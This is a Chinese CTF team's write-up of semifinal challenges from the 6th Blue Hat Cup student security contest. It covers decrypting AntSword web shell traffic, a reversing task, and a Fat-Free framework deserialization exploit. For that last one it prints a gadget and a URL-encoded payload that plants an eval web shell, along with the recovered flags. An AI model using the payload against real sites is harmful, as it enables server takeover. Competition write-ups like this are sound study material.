第六屆”藍帽杯“全國大學生網絡安全技能大賽（半決賽）電子取證賽題
第六屆”藍帽杯“全國大學生網絡安全技能大賽（半決賽）其他賽題

【Misc】加密的通道

1、經過wireshark分析發現是蟻劍流量

2、在http請求中有哈希文本

3、嘗試幾輪后發現是加密的PHP，使用zym解密

參考文章：[Web逆向] PHP解密：zym加密 帶亂碼調試過程
exp.php

<?phpfunction decrypt($data, $key) {$data_1 = '';for ($i = 0; $i < strlen($data); $i++) {$ch = ord($data[$i]);if ($ch < 245) {if ($ch > 136) {$data_1 .= chr($ch / 2);} else {$data_1 .= $data[$i];}}}$data_1 = base64_decode($data_1);$key = md5($key);$j = $ctrmax = 32;$data_2 = '';for ($i = 0; $i < strlen($data_1); $i++) {if ($j <= 0) {$j = $ctrmax;}$j--;$data_2 .= $data_1[$i] ^ $key[$j];}return $data_2; }function find_data($code) {$code_end = strrpos($code, '?>');if (!$code_end) {return "";}$data_start = $code_end + 2;$data = substr($code, $data_start, -46);return $data; }function find_key($code) {// $v1 = $v2('bWQ1');// $key1 = $v1('??????');$pos1 = strpos($code, "('" . preg_quote(base64_encode('md5')) . "');");$pos2 = strrpos(substr($code, 0, $pos1), '$');$pos3 = strrpos(substr($code, 0, $pos2), '$');$var_name = substr($code, $pos3, $pos2 - $pos3 - 1);$pos4 = strpos($code, $var_name, $pos1);$pos5 = strpos($code, "('", $pos4);$pos6 = strpos($code, "')", $pos4);$key = substr($code, $pos5 + 2, $pos6 - $pos5 - 2);return $key; }$input_file = $argv[1]; $output_file = $argv[1] . '.decrypted.php';$code = file_get_contents($input_file);$data = find_data($code); if (!$code) {echo '未找到加密數據', PHP_EOL;exit; }$key = find_key($code); if (!$key) {echo '未找到秘鑰', PHP_EOL;exit; }$decrypted = decrypt($data, $key); $uncompressed = gzuncompress($decrypted); // 由于可以不勾選代碼壓縮的選項，所以這里判斷一下是否解壓成功，解壓失敗就是沒壓縮 if ($uncompressed) {$decrypted = str_rot13($uncompressed); } else {$decrypted = str_rot13($decrypted); } file_put_contents($output_file, $decrypted); echo '解密后文件已寫入到 ', $output_file, PHP_EOL;

使用

php exp.php decode.php

decode.php為需要解密的文件，得到rsa.php

4、賽后總結發現

貌似直接導出http也是可以的，然后把各個參數丟進去解密輸出后第一個參數base64解密后就是flag

flag{844dfc86da23a4d5283907efaf9791ad}

【Reverse】babynim

1、在NimMainModule函數中

2、比對格式、判斷長度

3、取中間的36位出來

4、算法就是 flag*e==enc

e=560063927934284409650605943439557376388765529190415191934763442152260285492096 72868995436445345986471 m=517484091195714939273140476977992136412862788940498402288045942239883725017828 94889443165173295123444031074892600769905627166718788675801 print((m//e))

flag{923973256239481267349126498121231231}

【Web】easyfatfree

1、掃描發現

2、.DS_Store

參考


我不會，所以并沒有什么用

3、下載源碼看看

4、代碼審計后發現lib文件夾有寫入權限，寫反序列化

<?phpnamespace DB;error_reporting(0);highlight_file(__FILE__);class Jig {constFORMAT_JSON=0,FORMAT_Serialized=1;protected $uuid, $dir, $format, $log, $data, $lazy;function __construct(){$this->lazy=true;$this->data=["/a.php"=>["<?php eval(\$_POST['1']);?>"]];$this->format=self::FORMAT_Serialized;$this->dir="lib";}}echo urlencode(serialize(new Jig())); ?>

運行結果：

O%3A6%3A%22DB%5CJig%22%3A6%3A%7Bs%3A7%3A%22%00%2A%00uuid%22%3BN%3Bs%3A6%3A%22%00%2A%00dir%22%3Bs%3A3%3A%22lib%22%3Bs%3A9%3A%22%00%2A%00format%22%3Bi%3A1%3Bs%3A6%3A%22%00%2A%00log%22%3BN%3Bs%3A7%3A%22%00%2A%00data%22%3Ba%3A1%3A%7Bs%3A6%3A%22%2Fa.php%22%3Ba%3A1%3A%7Bi%3A0%3Bs%3A26%3A%22%3C%3Fphp+eval%28%24_POST%5B%271%27%5D%29%3B%3F%3E%22%3B%7D%7Ds%3A7%3A%22%00%2A%00lazy%22%3Bb%3A1%3B%7D

5、主頁payload提交，在lib文件夾下寫入一句話

http://xxx.xxx.xxx.xxx:xxxx/?payload=O%3A6%3A%22DB%5CJig%22%3A6%3A%7Bs%3A7%3A%22%00%2A%00uuid%22%3BN%3Bs%3A6%3A%22%00%2A%00dir%22%3Bs%3A3%3A%22lib%22%3Bs%3A9%3A%22%00%2A%00format%22%3Bi%3A1%3Bs%3A6%3A%22%00%2A%00log%22%3BN%3Bs%3A7%3A%22%00%2A%00data%22%3Ba%3A1%3A%7Bs%3A6%3A%22%2Fa.php%22%3Ba%3A1%3A%7Bi%3A0%3Bs%3A26%3A%22%3C%3Fphp+eval%28%24_POST%5B%271%27%5D%29%3B%3F%3E%22%3B%7D%7Ds%3A7%3A%22%00%2A%00lazy%22%3Bb%3A1%3B%7D

6、中國蟻劍連接后在根目錄下拿到flag

url：

http://xxx.xxx.xxx.xxx:xxxx/lib/a.php

【Forensic】

別問，所有做出來的選擇題填空題都是我蒙的，以前沒接觸過
今后加強學習，下次藍帽再來了

總結

以上是生活随笔為你收集整理的[ CTF ]【天格】战队WriteUp-第六届”蓝帽杯“全国大学生网络安全技能大赛（半决赛）的全部內容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯，歡迎將生活随笔推薦給好友。